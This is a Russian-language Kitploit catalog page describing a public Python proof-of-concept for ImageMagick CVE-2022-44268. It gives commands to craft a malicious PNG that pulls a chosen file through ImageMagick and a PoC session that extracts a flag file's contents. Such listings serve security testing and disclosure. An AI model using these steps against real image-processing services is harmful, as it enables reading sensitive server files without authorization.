Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-44268 — Генератор полезных нагрузок и экстрактор для CVE-2022-44268, написанный на Python. | Kitploit
Инструменты/GitHubGitHub/agathanon/cve-2022-44268
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксфильтрация данныхСбор информации
GitHubagathanon/cve-2022-44268

cve-2022-44268

Генератор полезных нагрузок и экстрактор для CVE-2022-44268, написанный на Python.

Репозиторий
4123 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-44268

Авторы, обнаружившие эту уязвимость:

  • Bryan Gonzalez и Ocelot Team

Создание вредоносного PNG для эксплуатации ImageMagick 7.1.0-40:

  • CVE-2022-44267: Отказ в обслуживании
  • CVE-2022-44268: Раскрытие информации

Отказ от ответственности: Автор этого проекта не несёт ответственности за любой возможный вред, причинённый материалами этого проекта.

Требования

  • Python3
  • PIL (pip install Pillow)

Использование

Создание PNG с помощью craft.py:

root@kitploit:~
git clone https://github.com/agathanon/cve-2022-44268
cd cve-2022-44268
python3 craft.py original.png lol.png /path/to/file

Извлечение данных с помощью extract.py:

root@kitploit:~
python3 extract.py exfil.png

PoC

root@kitploit:~
anon@computer:~/code/cve-2022-44268$ python3 craft.py original.png readflag.png $PWD/flag.txt 
anon@computer:~/code/cve-2022-44268$ convert readflag.png -resize 100x100 exfil.png
anon@computer:~/code/cve-2022-44268$ python3 extract.py exfil.png
AAAABBBBCCCC

anon@computer:~/code/cve-2022-44268$ 
Скачать инструмент